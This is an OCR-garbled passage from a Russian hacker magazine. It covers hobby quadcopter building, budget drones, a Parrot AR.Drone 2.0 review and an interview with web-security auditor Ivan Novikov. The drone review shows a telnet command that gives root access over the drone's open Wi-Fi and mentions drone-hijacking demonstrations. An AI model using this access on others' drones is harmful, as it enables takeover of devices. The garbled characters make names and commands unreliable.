нове Агсіиіпо, Перед покупкой стоит всегда обращать внимание 
на используемые в плате датчики, так как развитие технологий 
не стоит на месте, а старье китайцам как-то надо распродать, 



к тому же не все сенсоры могут поддерживаться открытыми 
прошивками. 

Наконец, стоит упомянуть еще один компьютер — РХ4, отли- 
чающийся от клонов Агсіиіпо тем, что у него есть ІіИІХ-подобная 
операционная система реального времени, с шеллом, процес- 
сами и всеми делами. Но надо предупредить, что РХ4 — плат- 
форма новая и довольно сырая. Сразу после сборки не полетит. 

Настройка полетных параметров, как и программы настрой- 
ки, очень индивидуальна для каждого проекта, а теория по ней 
могла бы занять еще одну статью, поэтому вкратце: почти все 
прошивки для мульти коптеров основаны на РЮ-регуляторе, 
и основной параметр, требующий вмешательства, — пропор- 
циональная составляющая, обозначаемая как Р или гаІеР Если 
при взлете твой коптер дергается из стороны в сторону, то это 
значение надо уменьшать, если же вяло реагирует на внеш- 
ние воздействия, то наоборот — повышать, остальные нюансы 
ты сможешь найти в инструкциях и на сайтах разработчиков. 

УПРАВЛЕНИЕ 

Немного про радиоаппаратуру. Сейчас практически все пере- 
датчики для летающих моделей работают на частоте 2,4 ГГц. 
Они достаточно дальнобойные, и этот частотный диапазон 
не так зашумлен, как, например, 900 МГц. Для полета вообще- 
то достаточно четырех каналов: газ, рыскание, тангаж, крен. Ну 
а восьми каналов точно хватит и на что-нибудь еще. 

Комплект обычно состоит из самого пульта и приемника. 
На приемнике находятся ручки управления и дополнительные 
кнопки. Обычно выбирают аппаратуру Мобе2, когда левый стик 
управляет газом и поворотом, а правый — наклонами коптера. 
Все ручки, кроме газа, подпружинены и возвращаются в на- 
чальное положение при отпускании. Также стоит обращать 
внимание на количество каналов. Для беспилотника потребу- 
ется четыре канала управления и один канал для переключения 
режимов полета, кроме того, могут потребоваться дополни- 
тельные каналы для управления камерой, для настройки или 
для особых режимов полетного контроллера. При выборе пуль- 
та стоит также учитывать возможность смены радиомодуля, 
чтобы в будущем его можно было легко обновить. ТЕ 




Для полетов с камерой 
обзаведись подвесом, 
который будет удержи- 
вать камеру параллельно 
горизонту при манев- 
рах, а также поможет 
управлять наклоном 
камеры. Большинство 
контроллеров имеют вы- 
ходы для стабилизации 
подвесов с сервопри- 
водом, а также выход 
для переключателя 
управления кнопкой 
спуска камеры. 




БЕЗОПАСНОСТЬ 

Все новички, думая о безопасности, вспоминают АП.Эгопе 
и его защиту винтов. Это хороший вариант, и он работает, 
но только на мелких и легких аппаратах, а когда вес твоего 
коптера начинает приближаться к двум килограммам или 
давно перевалил за эту цифру, то спасти может только прочная 
железная конструкция, которая будет весить очень много 
и, как ты понимаешь, сильно уменьшит грузоподъемность 
и автономность полета. Поэтому лучше сперва тренироваться 
подальше от людей и имущества, которое можно повредить, 



а уже по мере улучшения навыков защита станет и не нужна. 

Но даже если ты пилот со стажем, то не забывай о технике без- 
опасности и продумывай возможные негативные последствия 
твоего полета при нештатных ситуациях, особенно при полетах 
в людных местах. Не стоит забывать, что сбой контроллера или 
канала связи может привести к тому, что аппарат улетит от тебя 
далеко, и тогда для поиска может пригодиться ѲР8-трекер, 
установленный заранее на коптер, или же простая, но очень 
громкая пищалка, по звуку которой ты сможешь определить его 
местоположение. Настрой и заранее проверь функцию ІаіІ заіе 
твоего полетного контроллера, которая поможет приземлиться 
или вернуть коптер наточку старта при потере сигнала с пульта. 
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Бюджетные квадрокоптеры 




Александр Расмус 



АП.Огопе — аппарат, заслуживший популярность как благодаря соотношению 
цены и функционала, так и за счет доступности (его часто можно встретить 
даже в обычных магазинах электроники). Тем не менее это далеко не един- 
ственный готовый аппарат, и при желании можно найти машинку и подешевле. 




ГОМКЕПАОП 

ЬАОУВШО 

а оо.аІ/ОІШ У 

І_асІуЬігсІ, скорее, миниатюрная игрушка с сим- 
патичным дизайном и по возможностям вряд 
ли сможет тягаться с крупными собратьями. 

Ее вес составляет около 30 г, а время поле- 
та — менее десяти минут. Однако функционал 
(в зависимости от модели) у нее доволь- 
но внушительный. Самая дешевая модель 
обойдется в 35 долларов, самая дорогая 
(и оснащенная камерой РРѴ, передающей изо- 
бражение на экран пульта) — до 200 долларов. 
На доставку нужно заложить еще 50 долларов. 
Управляется «божья коровка» не смартфо- 
ном, а радиопультом, работающим на частоте 
2,4 ГГц, и в разных конфигурациях встречаются 
разные версии контроллера — от самого про- 
стого ОЕѴО 4 до самого продвинутого ЭЕѴО 7. 
В общем, неплохая модель для того, чтобы 
поиграться в помещении. 



СПА2ѴРЫЕ ЫАЫО 
СШАОКОСОРТЕП 

Еще более компактный аппарат, относящийся 
к классу РСВ-коптеров. Это означает, что ос- 
новой для рамы служит сама печатная плата 
бортового компьютера. Благодаря этому вес 
устройства составляет 19 г. Время полета — 
до семи минут. По задумке создателей, этот 
аппарат лучше всего подойдет для разработки 
и прототипирования — на сайте доступны все 
исходные коды, а само устройство значитель- 
но проще, компактнее и безопаснее крупных 
моделей. Управление производится с компьюте- 
ра — для этого в комплект входит ІіЗВ-приемник 
для 2, 4- гигагерцевого радиосигнала. Самая де- 
шевая модель обойдется в 149 долларов, самая 
дорогая — в 179 долларов. Доставка станет еще 
в 35-60 долларов, в зависимости от выбранной 
службы. Отличие более дорогой версии — в до- 
полнительных сенсорах. 



О-ВОТМІСПО 

СШАОКОСОРТЕП 

ао о.аІ/іІѵѵМ к 

Еще один бюджетный аппарат, стоимость 
которого начинается от 30 долларов, еще 
столько же стоит доставка. Следует учиты- 
вать, что в комплект не входит пульт, но Місго 
Оиасігосоріег совместим со стандартными 
контроллерами. Плюсом является и то, что в по- 
ставке идет сразу два аккумулятора, а также на- 
бор запасных пропеллеров. Это важно, так как, 
по отзывам владельцев, лопасти достаточно 
часто слетают при падении и из-за маленького 
размера их бывает непросто найти. Вес состав- 
ляет 26 г, время полета — около десяти минут. 
По замыслу создателей, этот аппарат подходит 
для сложных маневров, поэтому малютка 
поддерживает несколько режимов скорости 
и управления. При переключении в так называ- 
емый акробатический режим аппарат становит- 
ся более чувствительным к управлению. 







СОѴЕПЗТОПѴ 
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АК.Эгопе 2*о: обзор возможностей и дополнений 
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Как тебе уже должно было стать понятно к этому моменту, сборка квадрокоптера — увлека- 
тельная, но непростая затея. Для тех, кому интереснее ковыряться с софтом, а не сборкой, 
лучше подойдут готовые модели. В 2010 году компания Раггоі выпустила рыночную версию 
квадрокоптера АРШгопе. Это было первое решение для массового потребления, которое име- 
ло адекватную цену и полную открытость для энтузиастов электронщиков и программистов. 
Аппарат стал однозначным хитом. В данной статье мы хотим рассказать о второй версии этого 
квадрокоптера — АВ.Огопе 2.0, который вышел в 2012 году. 



ТЕХНИЧЕСКИЕХАРАКТЕРИСТИКИ 

Квадрокоптер Раггоі АНЮгопе 2.0 оснащен четырьмя моторами мощностью 
14,5 Вт, которые выдают 28 500 РРМ. В редукторе используются шестерни 
из нилатрона для понижения шумов. На контроллере каждого мотора ис- 
пользуется 8 МІРЗ АѴН СРЫ, а сам контроллер влагоустойчив. Максимальная 
скорость полета — 18 км/ч. На борту квадрокоптера установлены две видео- 
камеры: 

• фронтальная Н 0-камера с разрешением 720р, 30 РРЗ с углом объектива 

в 92 градуса; 

• нижняя (ЗѴѲА-камера (320 * 240), 60 РРЗ с углом объектива 64 градуса. Ее 

АРШгопе также использует для замеров горизонтальной скорости. 

«Мозги» дрона представляют собой 1 ГГцАРІМ Согіех А8 процессор с 800 Гц 
ЭЗР ТМ33200МС64Х для видео, 1 Пбит ООЯ2 ВАМ на 200 МГц. И управляется 
это все с помощью Ыпих 2.6.32. Соединение с «пультом» управления (которым 
в штатном варианте являются іОЗ- и АпбгоісІ-девайсы} происходит по ѴѴі-Рі. 
Так что коптер несет на себе ѴѴі-Рі -точку. Ориентация в пространстве проис- 
ходит за счет трехосевого гироскопа, трехосевого акселерометра, трехосе- 
вого магнитометра (магнитный компас), датчика давления и ультразвукового 
высотомера (на самом деле дальномера). На борту также есть ЫЗВ-разъем 
для подключения внешнего накопителя. СРЗ-приемника в штатной комплек- 
тации нет, но об этом чуть ниже. 

Несмотря на то что АРШгопе — это коммерческий продукт для конечного 
потребителя, его компоновка позволяет без проблем подключать к нему до- 
полнительные аппаратные компоненты или вмешиваться в работу существу- 
ющих. При подвеске на дрон дополнительного оборудования весом до 150 
граммов это не сказывается на качестве его полета — динамике и стабили- 
зации. При подключении аккумулятора к квадрокоптеру происходит загрузка 
его ОС и инициация систем. Также включается ѴѴІ-Рі-точка, к которой можно 
подключиться любым ѴѴі-Рі-устройством. Изначально управление коптером 
доступно только с ЮЗ- или Ап б го ісі -де вайсов, но на моіесіз.аі гоп ог мож- 
но найти способы для подключения с ноутбуков и настольных ПК с \Л/і-РІ. По- 
скольку у АНЮгопе есть открытый АРІ, то подключаться к нему можно с чего 
угодно, лишь бы там работал софт с использованием штатных библиотек. 

В базовом функционале квадрокоптер формирует пару с мобильным 
устройством и в дальнейшем подключение к его ѴѴі-Рі-точке возможно только 



с этого устройства. И разумеется, есть возможность разрыва пары при необ- 
ходимости. Использование ѴѴі-Рі — определенная дыра в безопасности дрона. 
Почему? Да все очень просто: подключаемся ноутбуком к его точке. Зная его 
ІР-адрес, запускаем сканирование портов и получаем, что 23-й порт открыт. 
Подключаемся кдрону: 

> -Ьеі пеі: 192.168.1.1 23 

ВизуВох у1^14.Ѳ () Ьиі11>іп зііеіі^ (азЬ) 

Епѣег 'Ьеір' "Рог. а 1і$1: оР ЬиіІРгіп соттапсіз . 



есЬо $1)5ЕК 
гооР 



Таким образом, мы просто можем зайти на квадрокоптер с правами гооі. 
Что это дает? Ну, например, в рамках контеста Розіііѵе Наск Эауз СРТ 2012 
было задание на перехват управления дроном, которое успешно решили. 
А на соревновании ОгопеСатез 2012 был продемонстрирован вирус, которым 
заражался один дрон, и далее тот начинал заражать им другие дроны в зоне 
видимости, перехватывая управление ими. Имея под рукой ВизуВох и рутовый 
доступ к нему, можно делать и не такое. Это полезная функция для энтузиастов, 
но дыра в безопасности для злоумышленников. Поэтому для ѴѴі-Рі АРЮгопе 
можно установить защиту ѴѴРА2, используя мод агбгопе-\л/ра2 из СіІНиЬН, и за- 
щитить свой дрон от кулхацкеров. Еще один недостаток ѴѴІ-РІ — у него ограни- 
ченный радиус действия , при выходе из которого квадрокоптер принудительно 
приземлится. Что будет под дроном в этот момент: ровная площадка, лес или 
вода, — его не сильно волнует. Конечно, можно без проблем поставить более 
мощную ѴѴІ-Рі-антенну для расширения радиуса, но есть и другие способы. На- 
пример, при помощи Агбиіпо и типовых для авиамоделирования модулей при- 
емника и передатчика радиус полета дрона повышается до 1 ,5-2 км. Но можно 
сделать радиус полета вообще практически бесконечным — с помощью той же 
Агбиіпо и ОЗМ- модуля координировать полет дрона можно через сотовую сеть. 
Главное, чтобы в зоне полета было устойчивое сотовое покрытие. 

ГЛАЗА 

Видеокамеры, установленные на борту квадрокоптера, играют разные роли. 
Фронтальная камера транслирует видеопоток 720р по ѴѴі-Рі на управляющее 
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усчюйсіво Мпжни записывать эгоі поток на устройстве (эту функцию пред- 
лагают стандартные приложения) или подключить внешний УЗВнакопитель 
к самому дрену и запись будет вестись на него На накопителе должно быть 
минимум 100 Мб свободного пространства и файловая система ГАТ32. 

Вертикальная камера, расположенная в нижней части корпуса дрона, дает 
ОѴОА-разрешеиие. В ПО АН Огогтс заложена функция отслеживания горизон- 
тальной скорости с использованием вертикальной камеры по принципу, ана- 
логичному принципу в компьютерных мышках. 

Говоря о видео, нельзя не упомянуть звук: микрофонов на борту АН. Огопе 
нет. Это понятно, потому что шум от четырех моторов забил бы л ібой микро- 
фон. Опыты, проведенные с подвешиванием камер ОоРго к АРШгопе и запи- 
сью видео со звуком, показали, что качество звука даже при использовании 
алгоритмов шумоподавления оставляет желать лучшего. Но чю мешает кому- 
то выйти с гениальным решением этой проблемы и удивить весь мир? 

При всем при этом на борт дрона можно установить динамик и, пролетая 
над компанией друзей, транслировать Вагнера и его «Полет валькирий». 

КРЫЛЬЯ И ТЕЛО 

Эксплуатация дрона предполагается как в помещении, так и на открытых 
пространствах. В комплекте предусмотрены два сменных кожуха из вспе- 
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ненного полипропилена. Этот материал легок, но обеспечивает достаточ- 
ную жесткость конструкции. Кожух для полетов в помещении имеет за- 
щиту винтов, которая сможет предохранить от несильных столкновений. 
Для полетов на открытом пространстве используется облегченный вари- 
ант кожуха, не имеющий защиты винтов, как следствие, он весит почти 
в два раза меньше. 

Поведение в воздухе регулируется настройками приложений. Углы, ско- 
рости реакций, ограничения высот и ряд других параметров хорошо регули- 
руются настройками. Квадрокоптер умеет делать боковой переворот на 360 
градусов. Выполнять этот маневр лучше с запасом высоты, так как на завер- 
шающем этапе он теряет где-то 40-50 см высоты. Остальные же маневры 
выполняются в штатных приложениях или за счет наклона устройств, тогда 
приложение получает информацию с гироскопов мобильного устройства 
и передает команды на рули, или за счет нарисованных на экране джойсти- 
ков. Возможна и комбинация этих методов. 

При полете в помещении можно включить функцию поддержания высоты, 
которую дрон определяет с помощью ультразвуковых дальномеров (на вы- 
сотах менее 6 м), но тут есть особенность: если в комнате стоит стол, то, 
пролетая над ним, дрон немного наберет высоту, так как поверхность (стол) 
стала к нему ближе, чем была (пол). Надо учитывать это, чтобы квадрокоптер 
не уперся в потолок. 

Также у дрона есть функция стабилизации полета, которая пригождается 
как в помещении, так и вне его. В помещении винты квадрокоптера создают 
воздушные возмущения, которые, отражаясь от близко стоящей мебели или 
других предметов, способны влиять на сам квадрокоптер. Поэтому в плотно 
заставленных комнатах дрон немного покачивается от собственных воздуш- 
ных потоков. 

Вне помещений стабилизация пригождается для борьбы с ветром. 
При слабом ветре дрон достаточно хорошо себя стабилизирует, но на силь- 
ном (особенно на высоте) его заметно качает. Говоря о метеоусловиях, нельзя 
не упомянуть, что инструкция не рекомендует использовать АН. Ргопе в дождь 
и снег — многие элементы (контроллеры моторов, сами моторы) открыты 
и подвержены коррозии. 
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Хит в небе 



ЗАКЛЮЧЕНИЕ 

Итак, что же в этом АРШгопе такого, что им увлеклось столько 
людей? Есть же другие квадро ко птеры, которые могут, в отличие 
от АРШгопе, нести до килограмма полезной нагрузки. Могут на- 
ходиться в воздухе до часа, при этом активно транслируя видео 
и навигационный поток на землю. Они же могут летать в плохих 
метеоусловиях, будь то проливной дождь или сильный снего- 
пад. Круто? Ну круто же! А сколько они стоят? Как правило, это 
профессиональные летательные аппараты и цены исчисляются 
тысячами и десятками тысяч евро. И да, у многих других квадро- 
и октокоптеров есть свои АРІ и ЗЭК, но нет такой популярности. 
Но вряд ли найдется много желающих разбирать свой квадро- 
коптер за 2 тысячи евро, чтобы подключить к нему Агбиіло или 
какую-то дополнительную плату. Да и производители подобных 
коптеров не сильно стремятся пускать энтузиастов внутрь своих 
устройств. Так что же такое АРШгопе? Можно сказать, что это 
Агбиіпо в мире любительских летательных аппаратов. Это плат- 
форма по скромной для рынка этих аппаратов стоимости, кото- 
рая позволяет любому энтузиасту авиамоделисту, электронщи- 
ку или программисту реализовывать свои идеи. Не зря вокруг 
этого продукта собралось такое сообщество и такое количество 
различных модификаций и усовершенствований. Подходит 
этот квадрокоптер и для тех, кто видит в нем лишь средство 
для игры, ■ интеграция из коробки со смартфонами и интуи- 
тивное управление позволяют использовать его по принципу 
«включил и играй». Доступность устройства тоже вносит свой 
вклад — в отличие от многих других квадро коптеров, АРШгопе 
есть в наличии во многих розничных магазинах России, и дале- 
ко не только в Москве. Так что хочется надеяться, что компания 
Раггоі продолжит развитие линейки АРШгопе, чтобы все увле- 
ченные летающими роботами люди смогли реализовывать свои 
идеи. АРШгопе — это и игрушка, и инструмент, и каждый исполь- 
зует его так, как больше хочется. ЗЕ 




Продолжая тему программного управления АРШгопе, нельзя 
не коснуться мода под названием Гѵіосіесоріег. Это мод, с исполь- 
зованием которого управлять полетом дрона можно с помощью 
ІЧобе-із. Для разработчиков это несколько более дружественный 
способ, нежели писать и компилировать код на Си с использова- 
нием АРІ -библиотек. Это также снижает некий «порог вхождения» 
за счет того, что разработка под Ыосіе.із значительно проще, чем 
под Си, и таким образом большее количество людей может при- 
нимать участие в программировании под АРШгопе. 

Мод позволяет получать данные сенсоров и простыми опера- 
циями передавать команды дрону. Подобные скрипты часто ис- 
пользуются на мероприятиях для предварительного программиро- 
вания программы полета дрона и дальше запуска демонстрации. 



С помощью Ыосіе.із можно раздавать коптеру команды лишь 
в стиле «повернись направо на 0,5», «сделай флип налево» и про- 
чее в таком стиле. Но для полета по маршруту этого мало или 
как минимум это неудобно. Встроенного ОРЗ-приемника в квадро- 
коптере нет. Проблема решается разными способами. Например, 
возможна установка на него внешнего ОРЗ-приемника с помощью 
Агбиіпо. Также Ра г го* в феврале этого года анонсировала выпуск 
подключаемого ОРЗ- модуля. Он подключается к бортовому ІІЗВ- 
разъему и передает координаты устройству. Кроме того, он содер- 
жит в себе четырехгигабайтный накопитель и выполняет функцию 
флешки для записи видео. Анонсированный модуль поддерживает 
протокол МАѴипк, что дает возможность использовать, напри- 
мер, софт СЮгоипсЮопІгоІ, с помощью которого можно расставить 
заранее маршрутные точки и запустить дрон для полета по ним, 

А поскольку МАѴЫпк имеет открытый исходный код и АРІ, это по- 
зволяет писать любой софт для навигации дрона. 



Открытость платформы АРШгопе и доступность его аппаратных 
компонентов делают его легко модифицируемым. С помощью 
мода Огопбиіпо можно без труда интегрировать АРШгопе с Агсііипо 
Мало. Таким образом можно совместно использовать возмож- 
ности платформ и добавлять на квадрокоптер дополнительные 
сенсоры, системы навигации, освещение, звуковые динамики, 
управление с джойстика и многое другое. 

Интеграция управления АРШгопе с такими девайсами, 
как Ыіпіепсіо ѴѴіі и МісгозоН Кіпесі, уже давно не фантастика. 
Сенсоры распознают движения «пилота» и передают команды 
на квадрокоптер. Да, написание софта для МісгозоИ Кіпесі требует 
определенной квалификации, но для того АРІ/ЗЭК и делаются. 

Но если посмотреть дальше, то выходит, что «пульт» уже и не так уж 
нужен. На КіскзІаПег был размещен девайс под названием МѴО — 
это браслет, который надевается на руку, получает информацию, 
считывая электрическую активность в мышцах двигающейся руки, 
и передает команды по ВІиеіооІН. В проморолике было показано 
управление АРШгопе с помощью такого браслета. Он еще недосту- 
пен публично и все еще ожидает своего выхода на рынок, но роли- 
ки выглядят крайне многообещающе. То есть, если предположить, 
что проблему управления дроном мы решили и пульт больше 
не нужен, осталось решить вопрос с выводом телеметрии дрона. 

И тут приходит мысль об очках. Ведь если вывести всю необходи- 
мую информацию на очки и обеспечить управление с помощью 
носимого браслета, то и пульт больше не нужен. 
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Белая шляпа 



Беседовал Степан Ильин 







ИВАН НОВИКОВ 
АКА ВЛАДИМИР 
ВОРОНЦОВ 



Этого человека многие знают как Владимира Воронцова. Другие как сІОіпрр. 
И не так уж важно, что на самом деле его зовут Иван Новиков. Главное, 
что это один из самых идейных ѵѵЫІеІіаГов России. Он знает почти все о без- 
опасности веб-приложений. И своим примером показывает, что эти зна- 
ния можно пустить в правильное русло, не только делая мир безопаснее, 
но и строя на этом успешную технологическую компанию. 



ѴѴНІТЕНАТ Ѵ5 ВІ.АСКНАТ 

Я всегда был идейным жПіІеІіаІ'ом. Никогда не «болтал- 
ся в воздухе», никогда не был в положении «я студент, и мне 
нечего делать». После поступления в университет сразу 
началась работа, так что времени не оставалось. А тратить 
свое свободное время на то, чтобы чем-то рискнуть, что- 
нибудь взломав... это полный бред. Меня такие мысли ни- 
когда не посещали. 

У блэков есть интуиция. Обычно все сразу понятно 
по скиллам. Даешь человеку тестовое задание, наблюда- 
ешь за ним и, как правило, сразу понимаешь, что он делал 
раньше. Блэки не пытаются найти уязвимости типа пачки 
Х55 — они пытаются добиться фактического результата, 
разными способами. 

Вообще, заработать можно на чем угодно. Вопрос 
лишь в том, чего ты хочешь. Если ты хочешь зарабатывать 
деньги, ты вряд ли станешь заниматься безопасностью — 
это, пожалуй , самый трудоемкий и глупый способ для этого :). 

Да, говорят, что ЫаскКаі’ы получают больше. Од- 
нако непонятно, что они на самом деле творят — ломают, 
вирусы рассылают или еще что. Есть черные ЗЕО, которые 
получают много денег. Однако в основном они занимаются 
нетехническими вещами. 

Мне смутно кажется, что люди, ломающие что-то 
руками, все равно нуждаются в каких-то еще скиллах. 

И я сильно сомневаюсь, что многие ЫаскбаШ хорошо за- 



рабатывают. Большинство из них воспринимают происхо- 
дящее как игру. Или занимаются откровенным криминалом, 
как те же кардеры. Если они и зарабатывают, то вовсе не по- 
тому, что хорошо ломают, а потому, что у них есть некая своя 
фишка — умение что-то организовать, сделать, закрутить. 
Это никак не связано с компьютерами. 

Просто нужно понять, что тебе нужно от жизни, и за- 
ниматься именно этим. 

Репутация — очень сложная штука, которую зараба- 
тывать надо годами, а потерять можно за минуту. 

Как я попал в ИБ? Не сразу. Пришел, как и все, из ин- 
тереса. Первый компьютер, йОЗ, бейсик, программирова- 
ние — примерно такая последовательность. 

Но сначала я пошел работать не в ИБ, а как все — 
программистом. Поработал какое-то время, а потом 
в 2009 году был конкурс по обходу проактивной защиты 
в движке Віігіх на СІтаоз Сопз^гисііопз. Я прошел его и по- 
нял, что пора менять работу. В результате отправился 
устраиваться в Розіііѵе Тесііпоіодіез, но меня туда не взя- 
ли. Тогда я подумал-подумал и решил, что буду делать 
аудиты сам, — ну а чего здесь такого? :) 

Когда я выиграл конкурс, в новостях опубликовали 
ссылку на 0№ес.ги. Там был блог с уязвимостями, кото- 
рые были найдены по іиІІ йізсіозиге, и кнопочка для оформ- 
ления заявки на заказ аудита веб-приложения. Так и нача- 
лась история компании СЖЗес. 




Один из основателей 
стартапа ОЫзес. 

Окончил физфак МГУ, 

Работает на Мае, так 
как «не сумел найти 
ноутбука удобнее Аіг». 
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Зарабатывать репутацию можно по-разному, глав- 
ное — результат. Тебя должны рекомендовать. Нет для ре- 
путации ничего лучше, чем положительный (отличный, вос- 
хищенный) отзыв о проведенном аудите на каком-нибудь 
закрытом ивенте между заказчиками. Громкие достижения 
тоже важны. 

Поэтому в конкурсах стараюсь участвовать до сих 
пор, чтобы показать — мы на волне, живы, развиваемся, 
не окостенели, И сам конкурсы стараюсь устраивать. 

ВСЕ ВКЛЮЧЕНО 

Фаундеров 0№ес исторически трое: Настя, я и Саша. 

Саша отвечает за сеть, наше облако, всю инфраструктуру 
и администрирование. Я занимаюсь алгоритмами и аудитом. 
Настя... Настя обеспечивает нам жизнь в «идеальном мире», 
чтобы мы могли работать, пока она занимается всем осталь- 
ным — бухгалтерией, кадрами, налогами, заказчиками, дого- 
ворами и прочим. Она администратор. 

Людей в компанию я находил, можно сказать, по кру- 
пицам. Некоторые участвовали в наших квестах, некоторые 
ушли из каких-то конкурирующих организаций. Бывает и так, 
что человек приезжает в Москву, оканчивает университет, ра- 
ботает здесь год и понимает, что смысла здесь жить просто 
нет. И едет человек домой, в прекрасный, зеленый Алтайский 
край. Получает там почти те же деньги, что и в Москве, но чув- 
ствует себя человеком, ловит рыбу сетями — ему классно. Так 
что у нас много удаленщиков — из Якутии, Читы, Украины, Гер- 
мании и других мест. 

Мы ищем людей не по каким-то шаблонам, типа 
«программист», — мы ищем именно людей. Главное, чтобы 
человек был хороший. 

Конечно, смотрим на общение, проводим анализ 
бэкграунда, но на первом месте стоит интерес самого чело- 



века. Если есть желание — все остальное приложится. Только 
желание должно быть где-то на уровне мании, одержимости. 
Когда с таким человеком общаешься — не важно, лично, через 
Зкуре или даже почту, — сразу чувствуется эта одержимость. 
И значит — сработаемся. 

Сейчас нас получается человек 17—20. Удаленщиков 
много. Ма каждый конкретный проект привлекаются разные 
люди, в зависимости от задач. 

Пентестов мы вообще-то не делаем. Мы проводим ау- 
диты веб-приложений. Иногда проводим стресс-тестирование 
веб-приложений, тесты «на пробив». 

Пентест — это задачка на пролом системы. Понятно, 
что он производит вау-эффект. По итогу пентеста ты отве- 
чаешь на вопрос, можно ли это взломать за такое-то время. 
Но пентест никак не помогает организовать эту самую без- 
опасность. Спустя месяц ты можешь заказать еще десяток 
пентестов, и тебя еще десять раз сломают. Если ты не будешь 
концептуально предпринимать никаких мер, ничего не изме- 
нится. 

Пентесты, возможно, имеют какой-то смысл в корпо- 
ративных сетях — там есть некие базовые вещи и понятно, 
как их настроить. Но в веб-приложениях все зависит от самого 
кода, там ничего не понятно, нет никаких гайдов. 

В аудите все по-другому — его идеология позволяет 
найти как можно больше всего (это будут не только какие-то 
реально эксплуатабельные уязвимости), общие вещи, кото- 
рые нужно править. 

Чтобы все это лучше продавалось, мы, конечно, вы- 
полняем какие-то «пробивы», вроде пентестов. Берется 
одна из тысячи найденных уязвимостей, эксплуатируется, 
и клиенту демонстрируется, как мы с ее помощью получаем 
полный доступ. Но в масштабах аудита это лишь небольшая 
работа на вау-эффект, чтобы тебя запомнили. 



17-20 

ЧЕЛОВЕК 
НА ДАННЫЙ 
МОМЕНТ РАБОТА- 
ЮТ В КОМПАНИИ 
0И8ЕС. НЕМАЛАЯ 
ЧАСТЬ УДАЛЕННО 






Основная работа — это изучение всего-всего. 

Она очень методичная, во многом неблагодарная, полуавто- 
матизированная, а иногда и ручная... В общем, унылая работа. 

Мы проводим и ѵѵНіІе Ьох, и Ыаск Ьох. Без исходных 
кодов и с ними. Что труднее? Не знаю, не могу разделить. 

Бывают очень простые ѵѵНіІе Ьох, когда приложение на- 
писано очень просто. Все потенциальные точки входа сосре- 
доточены в одном месте, которое можно быстро проверить 
и сказать «все плохо» или «все хорошо». А все остальное — 
просто обвязочки, расширяющие эти точки входа. Такие при- 
ложения бывают. 

Но бывают очень сложные Ыаск Ьох. Бывает наоборот. 

Сканер в таком деле не поможет. Мы исходим из того, 
что сначала нужно узнать приложение, понять, что и как оно 
делает. И только потом начинаем ломать. Нередко новый биз- 
нес какой-то для себя открываем, особенности, процессы. 

Мы вручную изучаем приложение, составляем об- 
щую картину того, что в нем есть. Исходя из нее, смотрим, 
к чему стремимся и где есть потенциальные проблемы. Мы 
пытаемся их предсказать. Садимся и обсуждаем, как мы про- 
ломим это приложение, в каких конкретно местах. Затем за- 
нимаемся сбором информации «вокруг периметра», изучаем 
приложение глубже, составляем всякие деревья вызовов. По- 
том в ход идут техники фаззинга, еще что-то — различные ав- 
томатизированные вещи. Ошибки логики ловим руками. 

Для Ыаск Ьох мы используем Віігр ЗиЛе, ничего лучше 
пока не видели. Для него у нас есть свои плагины и тулзы. Ни- 
каких Асипеііх не применяем, они бесполезные и бестолковые. 

Для ѵѵНіІе Ьох у нас есть свой сканер, статический 
и динамический анализатор. Их мы писали сами. Кстати, 
еще динамический сканер для РНР Артур Геркис писал, когда 
с нами работал. Утилита называется РѴТ — РНР ѴиІпегаЬШез 
Тгасег, исходники сейчас выложены. 

Фаззеры пишем «на месте». Ведь каждый фаззер уника- 
лен. Когда нужен, тогда и пишем. Пишем на чем угодно, чаще 
всего — на НиЬу и РНР. Либо можно многое подфаззить через 
Вигр ІЫгибег, Как правило, вещи вроде переборов мы дела- 
ем просто на Іпішбег. Там же есть и ЬК ТІір’ы. А всякие хитрые 
штуки, с обработкой рауіоасі’ов и фильтрами, обычно пишем 
на ВиЬу или РНР. 

Конечно, бывает, что к нам приходят и за пентестами 
веб-приложений. Мы можем сделать и это. Но мы пытаемся 
донести до людей, что сначала им нужен аудит, а уже потом 
можно провести пентестдля проверки. 

Как правило, после нашего аудита кому-то еще за- 
казывают пентест, а нам заказывают пентест после чьего-то 
аудита. Это нормально, я вообще не совсем понимаю ком- 
пании, которые придерживаются идеологии «это наш клиент, 
и будем с ним всю жизнь». Подобное невыгодно клиенту, ему 
выгодно менять команды и получать наиболее объективную 
оценку фактического уровня безопасности. 

Цена аудита на данный момент составляет от 100 
тысяч рублей и до бесконечности. Максимальная сумма 
зависит от многих факторов, но, наверное, это порядка не- 
скольких сот тысяч долларов. Это, скажем, аудит большого, 
многомиллионного ресурса. 

По времени аудит занимает от двух-трех недель 
до шести месяцев. У нас были проекты и по четыре месяца. 
Это аудит исходников, когда приложение многоплатформен- 
ное, много кода на разных языках (С, ^ѵа, куски на РНР). 

Мы работаем очень дотошно. Вообще стараемся 
не брать проекты «внахлест» и поэтому не всегда и не всех мо- 
жем взять сию минуту и начать проект. Бывает, проекты дела- 
ем долго, но непременно хорошо. 

КАК СДЕЛАТЬ ХОРОШИЙ ЖАР 

Началось все с того, что мы спокойно делали аудиты. 

Жили себе и жили. Но каждый раз, когда мы заканчивали аудит, 
оказывалось, что заказчик хочет, чтобы мы по итогам аудита 
еще и приняли какие-то меры, что-то изменили в его системе. 

Нам предлагали дополнительные деньги за настрой- 
ку какого-нибудь ѴѴАР вроде тосізесигііу. Поначалу мы 
брались за это, но вскоре поняли, насколько бесполезен такой 
подход. Нужно постоянно поддерживать регулярные выраже- 
ния, править их, чтобы не было Таізе’ов, — а это тоже очень 
трудно. Плюс от ппоб_зесигйу жутко падает производитель- 
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ОИзес нередко органи- 
зуют конкурсы и квесты. 
На 2его№дМ5 они делали 
«Царя горы». Не раз 
организовывали обход 
ѴѴАР (последний был 
на РНОауз). Регулярно 
организуют хак-квесты 
в рамках розыгрышей 
билетов на технические 
конференции. 



ность, а у заказчиков обычно дела с железом обстоят не очень 
хорошо. Поэтому мы отошли от такой практики и стали отве- 
чать: «Чуваки, настраивайте сами, это очень сложная работа». 

На тот момент с платными продуктами все было очень 
плохо. Были решения, которые просто не имели дистрибью- 
торов в России. Сейчас дистрибьюторы появились, но у них 
очень большие прайсы, что тоже отпугивает простых смертных. 
К тому же эти решения тоже совершенно неочевидны. Человек, 
не разбирающийся в безопасности, не сможет их применять. 

Любой ѴѴАР — это система Ю5/ІР5. Скажем, ты хочешь 
заниматься безопасностью, тебе нужно как-то работать с си- 
стемой, разбирать ее логи — а людей для этого у тебя нет. Это 
и есть самая большая проблема. 

Мы захотели сделать свое решение, но мы не делаем 
